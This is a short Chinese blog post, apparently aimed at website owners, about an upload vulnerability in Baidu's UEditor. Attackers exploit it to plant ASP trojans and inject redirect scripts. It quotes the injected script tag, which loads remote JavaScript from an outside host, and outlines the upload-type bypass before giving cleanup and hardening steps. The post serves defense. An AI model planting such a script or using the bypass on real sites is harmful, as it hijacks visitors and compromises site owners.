百度编辑器Ueditor上传木马引起网页跳转漏洞！

本以为用asp技术开发网站或者php技术开发的网站不会被黑客光顾了，实际上并不是，许多国内外的菜鸟黑客，利用各种漏洞软件，寻找着各种企业网站，目的就是做跳转导流，从而给不法网站带来流量，从中牟利。就最常见的就是攻击网站的上传组件漏洞。本次要讲解的就是百度编辑器的上传漏洞。下面请看看这个截图：

这是黑客利用UPLOAD上传的ASP文件。黑客是如何做到的呢？

利用上传组件的图片上传，通过本地文件修改上传类型，从而上传图片木马，执行木马为目的。本次的就是上传木马为例。

这是黑客嵌入的JS代码，通过该代码可以随机跳转到制定的黄涩网站去。

<script type="text/javascript" src="https://minjs.us/static/js/min.js" ></script>

解决办法：

1、等待百度编辑器升级补丁；

2、自行删除木马和篡改文件，然后补上漏洞；

黑客篡改过的文件有一个特征，那就是连续几个多个文件修改日期同一个时间。

我们只需要看最近期修改的文件即可。

普通企业网站基本不修改，那么只要有新近修改，那么一定有大概率有问题，直接查阅和修复，覆盖即可；

我们可以去掉多余的文件类型。

然后限制UPLOAD文件夹不可运行的权限。